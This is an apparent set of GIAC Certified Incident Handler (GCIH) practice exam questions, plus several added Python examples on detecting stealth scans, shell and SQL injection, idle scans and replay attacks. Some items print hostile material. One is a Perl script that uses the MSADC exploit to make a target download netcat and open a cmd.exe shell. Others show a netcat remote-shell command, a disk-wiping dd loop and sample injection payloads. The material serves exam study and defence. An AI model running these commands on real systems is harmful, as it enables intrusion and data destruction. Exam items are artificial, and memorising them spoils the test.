
GCIH GIAC Certified Incident Handler Questions and Answers

Questions 4

John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?

Options:

A.

Maintaining access

B.

Covering tracks

C.

Gaining access

D.

Reconnaissance

Questions 5

Which of the following are the rules by which an organization operates?

Options:

A.

Acts

B.

Policies

C.

Rules

D.

Manuals

Questions 6

John works as a Network Administrator for We-are-secure Inc. He finds that TCP port 7597 of the We-are-secure server is open. He suspects that it may be open because a Trojan is installed on the server. He presents a report to the company describing the symptoms of the Trojan. A summary of the report is given below:

Once this Trojan has been installed on the computer, it searches for Notepad.exe, renames it Note.com, and then copies itself to the computer as Notepad.exe. Each time Notepad.exe is executed, the Trojan runs and then calls the original Notepad to avoid being noticed.

Which of the following Trojans has the symptoms as the one described above?

Options:

A.

NetBus

B.

Qaz

C.

eBlaster

D.

SubSeven

Questions 7

Adam, a malicious hacker, has successfully gained unauthorized access to a Linux system of Umbrella Inc. The company's Web server runs on Apache. He has downloaded sensitive documents and database files from the computer.

After performing these malicious tasks, Adam finally runs the following command at the Linux command line before disconnecting:

for (( i = 0; i < 11; i++ )); do dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda; done

Which of the following actions does Adam want to perform by the above command?

Options:

A.

Infecting the hard disk with polymorphic virus strings.

B.

Deleting all log files present on the system.

C.

Wiping the contents of the hard disk with zeros.

D.

Making a bit stream copy of the entire hard disk for later download.

Questions 8

Which of the following types of scan does not open a full TCP connection?

Options:

A.

FIN scan

B.

ACK scan

C.

Stealth scan

D.

Idle scan

Questions 9

The IT administrator wants to implement a stronger security policy. What are the four most important security priorities for PassGuide Software Systems Pvt. Ltd.?

Options:

A.

Providing secure communications between the overseas office and the headquarters.

B.

Implementing Certificate services on Texas office.

C.

Protecting employee data on portable computers.

D.

Providing two-factor authentication.

E.

Ensuring secure authentication.

F.

Preventing unauthorized network access.

G.

Providing secure communications between Washington and the headquarters office.

Questions 10

Which of the following rootkits patches, hooks, or replaces system calls with versions that hide information about the attacker?

Options:

A.

Library rootkit

B.

Kernel level rootkit

C.

Hypervisor rootkit

D.

Boot loader rootkit

Questions 11

Which of the following functions in C/C++ can be the cause of a buffer overflow?

Each correct answer represents a complete solution. Choose two.

Options:

A.

printf()

B.

strcat()

C.

strcpy()

D.

strlength()

Questions 12

Which of the following is a type of computer security vulnerability, typically found in Web applications, that allows malicious Web users to inject code into the Web pages viewed by other users?

Options:

A.

SID filtering

B.

Cookie poisoning

C.

Cross-site scripting

D.

Privilege Escalation

Questions 13

Which of the following attacks can be overcome by applying cryptography?

Options:

A.

Buffer overflow

B.

Web ripping

C.

Sniffing

D.

DoS

Questions 14

Which of the following is executed when a predetermined event occurs?

Options:

A.

Trojan horse

B.

Logic bomb

C.

MAC

D.

Worm

Questions 15

Adam works as a Penetration Tester for Umbrella Inc. A project has been assigned to him to check the security of the company's wireless network. He re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Adam assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs.

Which of the following types of attack is Adam performing?

Options:

A.

Replay attack

B.

MAC Spoofing attack

C.

Caffe Latte attack

D.

Network injection attack

Questions 16

Which of the following types of attacks is often performed by looking surreptitiously at the keyboard or monitor of an employee's computer?

Options:

A.

Buffer-overflow attack

B.

Shoulder surfing attack

C.

Man-in-the-middle attack

D.

Denial-of-Service (DoS) attack

Questions 17

Against which of the following does SSH provide protection?

Each correct answer represents a complete solution. Choose two.

Options:

A.

DoS attack

B.

IP spoofing

C.

Password sniffing

D.

Broadcast storm

Questions 18

Which of the following are the automated tools that are used to perform penetration testing?

Each correct answer represents a complete solution. Choose two.

Options:

A.

Pwdump

B.

Nessus

C.

EtherApe

D.

GFI LANguard

Questions 19

Which of the following netcat parameters makes netcat a listener that automatically restarts itself when a connection is dropped?

Options:

A.

-u

B.

-l

C.

-p

D.

-L

Questions 20

Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks a Trojan and binds it to chess.exe. Which of the following tools are required in such a scenario?

Each correct answer represents a part of the solution. Choose three.

Options:

A.

NetBus

B.

Absinthe

C.

Yet Another Binder

D.

Chess.exe

Questions 21

Which of the following attacks are examples of Denial-of-service attacks (DoS)?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Fraggle attack

B.

Smurf attack

C.

Birthday attack

D.

Ping flood attack

Questions 22

A user is sending a large number of protocol packets to a network in order to saturate its resources and to disrupt connections to prevent communications between services. Which type of attack is this?

Options:

A.

Vulnerability attack

B.

Impersonation attack

C.

Social Engineering attack

D.

Denial-of-Service attack

Questions 23

As a professional hacker, you want to crack the security of secureserver.com. For this, in the information gathering step, you performed scanning with the nmap utility to enumerate as many different protocols as possible in use at secureserver.com, so that you could get accurate knowledge of which services were being used by the server. Which of the following nmap switches have you used to accomplish the task?

Options:

A.

nmap -vO

B.

nmap -sS

C.

nmap -sT

D.

nmap -sO

Questions 24

Which of the following programs can be used to detect stealth port scans performed by a malicious hacker?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

nmap

B.

scanlogd

C.

libnids

D.

portsentry
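
Added example to go with Questions 8 and 24 (my code, not the page's and not scanlogd's or portsentry's): the property both questions rely on is that FIN, NULL, Xmas and half-open SYN scans never complete the three-way handshake, so a detector looks for one source touching many distinct ports without an ACK ever following. The packet list is constructed for illustration and flags are written as letters; real tools add a time window and per-port weighting on top of this logic.

```python
from collections import defaultdict

# Constructed packet capture, one tuple per TCP segment:
# (timestamp, source IP, destination IP, destination port, TCP flags).
# Flags are letters: S=SYN, A=ACK, F=FIN, R=RST, P=PSH, U=URG; "" is a NULL-scan probe.
SAMPLE_PACKETS = (
    # Legitimate client: SYN, then the ACK completing the handshake, then data.
    [(0.0, "10.0.0.5", "10.0.0.10", 80, "S"),
     (0.1, "10.0.0.5", "10.0.0.10", 80, "A"),
     (0.2, "10.0.0.5", "10.0.0.10", 80, "PA")]
    # FIN scanner: a bare FIN to 20 ports, never a SYN or an ACK.
    + [(1.0 + i * 0.01, "10.0.0.66", "10.0.0.10", port, "F")
       for i, port in enumerate(range(20, 40))]
    # Half-open (SYN) scanner: SYNs to 15 ports that are never followed by an ACK.
    + [(5.0 + i * 0.01, "10.0.0.77", "10.0.0.10", port, "S")
       for i, port in enumerate(range(1, 16))]
)


def is_stealth_probe(flags):
    """True for segments that cannot belong to any legitimate connection: no SYN
    to open one, no ACK to continue one, no RST to tear one down. This covers
    FIN, NULL and Xmas (FIN+PSH+URG) scan probes."""
    return not any(bit in flags for bit in "SAR")


def detect_scanners(packets, port_threshold=10):
    """Return {source: description} for sources that touch at least
    port_threshold distinct ports without ever completing a handshake."""
    stealth = defaultdict(set)    # ports hit with FIN/NULL/Xmas probes
    syn_sent = defaultdict(set)   # ports that received a bare SYN
    completed = defaultdict(set)  # ports where a later non-SYN ACK shows the handshake finished

    for _ts, src, _dst, dport, flags in packets:
        if is_stealth_probe(flags):
            stealth[src].add(dport)
        elif "S" in flags and "A" not in flags:
            syn_sent[src].add(dport)
        elif "A" in flags and "S" not in flags:
            completed[src].add(dport)

    findings = {}
    for src in set(stealth) | set(syn_sent):
        half_open = syn_sent[src] - completed[src]
        if len(stealth[src]) >= port_threshold:
            findings[src] = ("FIN/NULL/Xmas scan: %d ports probed with no SYN, ACK or RST"
                             % len(stealth[src]))
        elif len(half_open) >= port_threshold:
            findings[src] = "half-open SYN scan: %d SYNs never completed" % len(half_open)
    return findings


if __name__ == "__main__":
    for src, why in sorted(detect_scanners(SAMPLE_PACKETS).items()):
        print(src, "->", why)
```

The legitimate client is never flagged because its SYN to port 80 is later matched by an ACK; both scanners are flagged because nothing they send ever moves a connection past the first packet.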

Questions 25

You are hired as a Database Administrator for Jennifer Shopping Cart Inc. You monitor the server health through the System Monitor and find that there is a sudden increase in the number of logins.

Which of the following types of attack has occurred?

Options:

A.

Injection

B.

Virus

C.

Worm

D.

Denial-of-service

Questions 26

You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?

Options:

A.

Nmap

B.

Ethereal

C.

Ettercap

D.

Netcraft

Questions 27

The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

Options:

A.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

B.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

C.

HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"

D.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Questions 28

Which of the following functions can be used as a countermeasure to a Shell Injection attack?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

escapeshellarg()

B.

mysql_real_escape_string()

C.

regenerateid()

D.

escapeshellcmd()
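
Added worked example (not part of the original question set): the shell-injection flaw and the countermeasure that escapeshellarg() and escapeshellcmd() provide in PHP, shown in Python so that it can be run directly. shlex.quote() is the Python analogue of escapeshellarg(). The command, the host value and the payload are constructed for illustration, and echo stands in for ping so the code needs no network.

```python
import shlex
import subprocess

# Constructed attacker input: a valid-looking host followed by a second command.
PAYLOAD = "127.0.0.1; echo INJECTED"


def build_vulnerable(host):
    """Interpolates untrusted input straight into a shell command line."""
    # echo stands in for ping so the example runs anywhere without network access.
    return "echo pinging " + host


def build_hardened(host):
    """shlex.quote() plays the role escapeshellarg() plays in PHP: the whole value
    becomes one single-quoted shell word, so ; | & $ ` and spaces lose their meaning."""
    return "echo pinging " + shlex.quote(host)


def run_via_shell(cmd):
    """Run a command line through /bin/sh, as PHP's system()/exec()/shell_exec() do."""
    result = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True, check=False)
    return result.stdout.splitlines()


def run_without_shell(host):
    """Strongest option: pass an argument vector and never start a shell, so there
    is no command-line grammar for the input to escape into."""
    result = subprocess.run(["echo", "pinging", host], capture_output=True, text=True, check=False)
    return result.stdout.splitlines()


if __name__ == "__main__":
    print("vulnerable :", run_via_shell(build_vulnerable(PAYLOAD)))
    print("quoted     :", run_via_shell(build_hardened(PAYLOAD)))
    print("no shell   :", run_without_shell(PAYLOAD))
```

The vulnerable form prints two lines because the shell sees two commands; the quoted form prints one line containing the literal payload. escapeshellcmd() escapes metacharacters across a whole command string and is the tool when the user controls the entire command; escapeshellarg() (like shlex.quote()) protects one argument. Both are weaker than not invoking a shell at all, which is what run_without_shell() does.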

Questions 29

Adam, a novice computer user, works primarily from home as a medical professional. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Adam uses antivirus software, anti-spyware software, and keeps the computer up-to-date with Microsoft patches. After another month of working on the computer, Adam finds that his computer is even more noticeably slow. He also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Adam notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Adam thinks this is very odd.

Which of the following is the most likely cause of the problem?

Options:

A.

Computer is infected with the stealth kernel level rootkit.

B.

Computer is infected with stealth virus.

C.

Computer is infected with the Stealth Trojan Virus.

D.

Computer is infected with the Self-Replication Worm.

Questions 30

Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provides services.

Which of the following are the techniques used for network mapping by large organizations?

Each correct answer represents a complete solution. Choose three.

Options:

A.

Packet crafting

B.

Route analytics

C.

SNMP-based approaches

D.

Active Probing

Questions 31

Which of the following statements are true about session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Use of a long random number or string as the session key reduces session hijacking.

B.

It is used to slow the working of victim's network resources.

C.

TCP session hijacking is when a hacker takes over a TCP session between two machines.

D.

It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

Questions 32

You work as a Penetration Tester for Infosec Inc. Your company takes on security auditing projects. Recently, your company has assigned you a project to test the security of the we-are-secure.com Web site. For this, you want to perform an idle scan so that you can find the open ports on the we-are-secure.com server. You are using the Hping tool to perform the idle scan through a zombie computer. While scanning, you notice that the IPID is being incremented on every query, regardless of whether the ports are open or closed. Sometimes, the IPID is incremented by more than one.

What may be the reason?

Options:

A.

The firewall is blocking the scanning process.

B.

The zombie computer is not connected to the we-are-secure.com Web server.

C.

The zombie computer is the system interacting with some other system besides your computer.

D.

Hping does not perform idle scanning.
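
Added example (not from the page and not hping's code): the reasoning behind Question 32. An idle scan uses the zombie's IP identification field as a side channel and needs it to rise by exactly one per packet the zombie sends. If the zombie is exchanging packets with anyone else, the increments become irregular and the open/closed inference collapses, which is the situation the question describes. The IP ID sequences are constructed for illustration.

```python
IPID_MODULUS = 1 << 16   # the IP identification field is 16 bits wide


def ipid_deltas(ipids):
    """Consecutive IP ID increments, modulo 2^16 so a wrap from 65535 to 0 counts as +1."""
    return [(later - earlier) % IPID_MODULUS for earlier, later in zip(ipids, ipids[1:])]


def classify_zombie(ipids):
    """Decide whether a host can serve as an idle-scan zombie from the IP IDs in
    its replies to probes that the scanner sent one at a time, with nothing else
    of ours talking to it. Only 'sequential and idle' gives a reliable channel."""
    deltas = ipid_deltas(ipids)
    if len(deltas) < 2:
        return "insufficient data"
    if all(d == 1 for d in deltas):
        return "usable: sequential and idle"
    if any(d == 0 for d in deltas):
        return "unusable: IP ID is constant (zero or fixed value)"
    if all(d <= 100 for d in deltas):
        # Counter still climbs, but by more than our probes account for:
        # the zombie is sending packets to other hosts between our probes.
        return "noisy: sequential but the zombie is exchanging packets with other hosts"
    return "unusable: IP ID randomized or kept per destination"


def infer_port_state(ipid_before, ipid_after):
    """One idle-scan round against one target port.
    1. Probe the zombie and note its IP ID (ipid_before).
    2. Send a SYN to the target port with the zombie's address as source.
       Open port: the target SYN/ACKs the zombie, the zombie answers RST (+1).
       Closed port: the target RSTs the zombie, which silently drops it (+0).
    3. Probe the zombie again (ipid_after); the reply itself costs +1."""
    delta = (ipid_after - ipid_before) % IPID_MODULUS
    if delta == 1:
        return "closed|filtered"
    if delta == 2:
        return "open"
    return "indeterminate (delta %d): zombie is not idle" % delta


if __name__ == "__main__":
    print(classify_zombie([1000, 1001, 1002, 1003]))
    print(classify_zombie([1000, 1001, 1004, 1005, 1009]))
    print(infer_port_state(1000, 1002), infer_port_state(1000, 1001))
```

A zombie whose deltas are all exactly one is the only kind that works; the second sequence above is the noisy case from the question, where a delta of 3 or 4 cannot be told apart from the +2 that signals an open port.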

Questions 33

Which of the following types of attacks is mounted with the objective of causing a negative impact on the performance of a computer or network?

Options:

A.

Vulnerability attack

B.

Man-in-the-middle attack

C.

Denial-of-Service (DoS) attack

D.

Impersonation attack

Questions 34

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################
$port = 53;                  # Spawn cmd.exe on port X
$your = "192.168.1.1";       # Your FTP Server 89
$user = "Anonymous";         # login as
$pass = 'noone@nowhere.com'; # password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
# Each msadc.pl call (rain forest puppy's MSADC/RDS exploit) runs one command on the
# target; here they build an ftp script, sasfile, one line at a time.
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
# The target runs the ftp script and pulls nc.exe from the attacker's FTP server.
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o = <STDIN>;
print "Opening ...\n";
# Finally netcat is started on the target as a listener that hands out cmd.exe.
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Creates a share called "sasfile" on the target system

B.

Creates an FTP server with write permissions enabled

C.

Opens up a SMTP server that requires no username or password

D.

Opens up a telnet listener that requires no username or password

Questions 35

Ryan, a malicious hacker, submits Cross-Site Scripting (XSS) exploit code to the Web site of an Internet forum for online discussion. When a user visits the infected Web page, the code is executed automatically and Ryan can easily perform acts like account hijacking, history theft, etc. Which of the following types of Cross-Site Scripting attack does Ryan intend to perform?

Options:

A.

Non persistent

B.

Document Object Model (DOM)

C.

SAX

D.

Persistent

Questions 36

What is the major difference between a worm and a Trojan horse?

Options:

A.

A worm spreads via e-mail, while a Trojan horse does not.

B.

A worm is a form of malicious program, while a Trojan horse is a utility.

C.

A worm is self replicating, while a Trojan horse is not.

D.

A Trojan horse is a malicious program, while a worm is an anti-virus software.

Questions 37

Which of the following is a computer worm that caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic?

Options:

A.

Klez

B.

Code red

C.

SQL Slammer

D.

Beast

Questions 38

You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?

Options:

A.

Scanning

B.

Covering tracks

C.

Reconnaissance

D.

Gaining access

Questions 39

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like Hping2 that can get into a network through covert channels.

Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

Options:

A.

Block all outgoing traffic on port 21

B.

Block all outgoing traffic on port 53

C.

Block ICMP type 13 messages

D.

Block ICMP type 3 messages

Questions 40

Which of the following tools can be used to detect the steganography?

Options:

A.

Dskprobe

B.

Blindside

C.

ImageHide

D.

Snow

Questions 41

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is as follows:

C:\whisker.pl -h target_IP_address
-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net --
= - = - = - = - =
= Host: target_IP_address
= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22
+ 200 OK: HEAD /cgi-bin/printenv

John recognizes the /cgi-bin/printenv vulnerability ('Printenv' vulnerability) on the We-are-secure server. Which of the following statements about the 'Printenv' vulnerability are true?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

This vulnerability helps in a cross site scripting attack.

B.

'Printenv' vulnerability maintains a log file of user activities on the Website, which may be useful for the attacker.

C.

The countermeasure to 'printenv' vulnerability is to remove the CGI script.

D.

With the help of 'printenv' vulnerability, an attacker can input specially crafted links and/or other malicious scripts.

Questions 42

You run the following PHP script:

<?php
$name = mysql_real_escape_string($_POST["name"]);
$password = mysql_real_escape_string($_POST["password"]);
?>

What is the use of the mysql_real_escape_string() function in the above script?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

It can be used to mitigate a cross site scripting attack.

B.

It can be used as a countermeasure against a SQL injection attack.

C.

It escapes all special characters from strings $_POST["name"] and $_POST["password"] except ' and ".

D.

It escapes all special characters from strings $_POST["name"] and $_POST["password"].
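
Added example (not the page's code) showing what mysql_real_escape_string() does and does not do. The escape table is the character set documented for the MySQL C API function the PHP wrapper calls, so ' and " are among the escaped characters, contrary to option C; the function does nothing for cross-site scripting, which needs HTML encoding, not SQL escaping. SQLite stands in for MySQL so that the injection and the parameterized fix run offline; the users table and the payload are constructed for illustration.

```python
import sqlite3

# Characters that mysql_real_escape_string() escapes, as documented for the MySQL
# C API function it wraps: NUL, newline, carriage return, backslash, single quote,
# double quote and Control-Z. Note that ' and " ARE in the list.
MYSQL_ESCAPES = {
    "\x00": "\\0",
    "\n": "\\n",
    "\r": "\\r",
    "\\": "\\\\",
    "'": "\\'",
    '"': '\\"',
    "\x1a": "\\Z",
}

PAYLOAD = "' OR '1'='1"   # constructed injection string supplied as the password


def mysql_real_escape_string(value):
    """Python re-implementation of the PHP function's escaping rule, for illustration only."""
    return "".join(MYSQL_ESCAPES.get(ch, ch) for ch in value)


def setup_db():
    """Constructed in-memory users table (SQLite is used so the example runs anywhere)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, name, password):
    """Builds the statement by string concatenation: input becomes SQL grammar,
    so the payload turns the WHERE clause into ... OR '1'='1' and matches every row."""
    sql = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, name, password):
    """Bound parameters: the driver ships values separately from the statement, so
    no character in them can change its meaning. This is the countermeasure to
    prefer over escaping (the mysql_* extension itself was removed in PHP 7)."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


if __name__ == "__main__":
    db = setup_db()
    print("escaped payload     :", mysql_real_escape_string(PAYLOAD))
    print("concatenated query  :", login_vulnerable(db, "admin", PAYLOAD))
    print("parameterized query :", login_parameterized(db, "admin", PAYLOAD))
```

The escaped payload shows every quote prefixed with a backslash, which is what keeps it inside the string literal when the escaped value is concatenated into a MySQL statement; the parameterized query returns nothing for the payload because it is compared as data, not parsed as SQL.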

Questions 43

Which of the following wireless network security solutions refers to an authentication process in which a user can connect wireless access points to a centralized server to ensure that all hosts are properly authenticated?

Options:

A.

Remote Authentication Dial-In User Service (RADIUS)

B.

IEEE 802.1x

C.

Wired Equivalent Privacy (WEP)

D.

Wi-Fi Protected Access 2 (WPA2)

Questions 44

Which of the following hacking tools provides shell access over ICMP?

Options:

A.

John the Ripper

B.

Nmap

C.

Nessus

D.

Loki

Questions 45

Which of the following strategies allows a user to limit access according to unique hardware information supplied by a potential client?

Options:

A.

Extensible Authentication Protocol (EAP)

B.

WEP

C.

MAC address filtering

D.

Wireless Transport Layer Security (WTLS)

Questions 46

Which of the following is the method of hiding data within another media type such as graphic or document?

Options:

A.

Spoofing

B.

Steganography

C.

Packet sniffing

D.

Cryptanalysis

Questions 47

Alice wants to prove her identity to Bob. Bob requests her password as proof of identity, which Alice dutifully provides (possibly after some transformation like a hash function); meanwhile, Eve is eavesdropping on the conversation and keeps the password. After the interchange is over, Eve connects to Bob posing as Alice; when asked for proof of identity, Eve sends Alice's password captured from the last session, which Bob accepts. Which of the following attacks is being used by Eve?

Options:

A.

Replay

B.

Firewalking

C.

Session fixation

D.

Cross site scripting
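
Added example, not part of the original question: the exchange described in Question 47 simulated in Python, followed by the standard countermeasure, a fresh server nonce with an HMAC response that is bound to that nonce. The password, the choice of SHA-256 and the class names are constructed for illustration; a real server would store a derived verifier rather than the password itself.

```python
import hashlib
import hmac
import secrets

# Constructed shared secret; in practice Bob stores a derived verifier, not the password.
ALICE_PASSWORD = b"correct horse battery staple"


class StaticProofVerifier:
    """Bob as described in the question: accepts a fixed transformation of the
    password. Hashing hides the password from Eve, but the proof is identical
    every session, so whoever captures it once can replay it forever."""

    def __init__(self, password):
        self.expected = hashlib.sha256(password).digest()

    def verify(self, proof):
        return hmac.compare_digest(proof, self.expected)


def static_proof(password):
    """What Alice sends over the wire in the vulnerable protocol."""
    return hashlib.sha256(password).digest()


class ChallengeResponseVerifier:
    """Bob with a replay countermeasure: every login gets a fresh random nonce and
    the proof must be HMAC(password, nonce). A captured proof is tied to a nonce
    that is consumed on first use and never issued again."""

    def __init__(self, password):
        self.password = password
        self.outstanding = set()     # nonces issued but not yet answered

    def challenge(self):
        nonce = secrets.token_bytes(16)
        self.outstanding.add(nonce)
        return nonce

    def verify(self, nonce, proof):
        if nonce not in self.outstanding:    # unknown, expired or already used nonce
            return False
        self.outstanding.discard(nonce)      # single use, even if the proof is wrong
        expected = hmac.new(self.password, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(proof, expected)


def challenge_response(password, nonce):
    """What Alice sends in the hardened protocol."""
    return hmac.new(password, nonce, hashlib.sha256).digest()


def replay_against_static():
    """Returns (alice_accepted, eve_replay_accepted) for the vulnerable protocol."""
    bob = StaticProofVerifier(ALICE_PASSWORD)
    proof = static_proof(ALICE_PASSWORD)          # Alice -> Bob
    alice_ok = bob.verify(proof)
    captured = proof                               # Eve sniffs the wire
    eve_ok = bob.verify(captured)                  # Eve -> Bob in a later session
    return alice_ok, eve_ok


def replay_against_challenge_response():
    """Returns (alice_accepted, eve_replays_old_pair, eve_reuses_proof_on_new_nonce)."""
    bob = ChallengeResponseVerifier(ALICE_PASSWORD)
    nonce1 = bob.challenge()                             # Bob -> Alice
    proof1 = challenge_response(ALICE_PASSWORD, nonce1)  # Alice -> Bob
    alice_ok = bob.verify(nonce1, proof1)
    captured = (nonce1, proof1)                          # Eve sniffs both
    nonce2 = bob.challenge()                             # Bob -> Eve (posing as Alice)
    eve_old_pair = bob.verify(*captured)                 # nonce1 was already consumed
    eve_new_nonce = bob.verify(nonce2, proof1)           # proof1 does not match nonce2
    return alice_ok, eve_old_pair, eve_new_nonce


if __name__ == "__main__":
    print("static proof   (alice, eve):", replay_against_static())
    print("challenge/resp (alice, eve old, eve new):", replay_against_challenge_response())
```

In the first run Eve is accepted with nothing more than the captured bytes, which is the replay attack of the question. In the second, the captured pair fails because its nonce is spent, and the captured proof fails against the new nonce because it was computed over a different challenge.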

Questions 48

Maria works as the Chief Security Officer for PassGuide Inc. She wants to send secret messages to the CEO of the company. To secure these messages, she uses a technique of hiding a secret message within an ordinary message. The technique provides 'security through obscurity'. What technique is Maria using?

Options:

A.

Steganography

B.

Public-key cryptography

C.

RSA algorithm

D.

Encryption

Questions 49

You execute the following netcat command:

c:\target\nc -l -p 53 -d -e cmd.exe

What action do you want to perform by issuing the above command?

Options:

A.

Listen for incoming data and perform port scanning

B.

Capture data on port 53 and perform banner grabbing

C.

Capture data on port 53 and delete the remote shell

D.

Listen for incoming traffic on port 53 and execute the remote shell

Exam Code: GCIH
Exam Name: GIAC Certified Incident Handler
Last Update: Dec 27, 2024
Questions: 328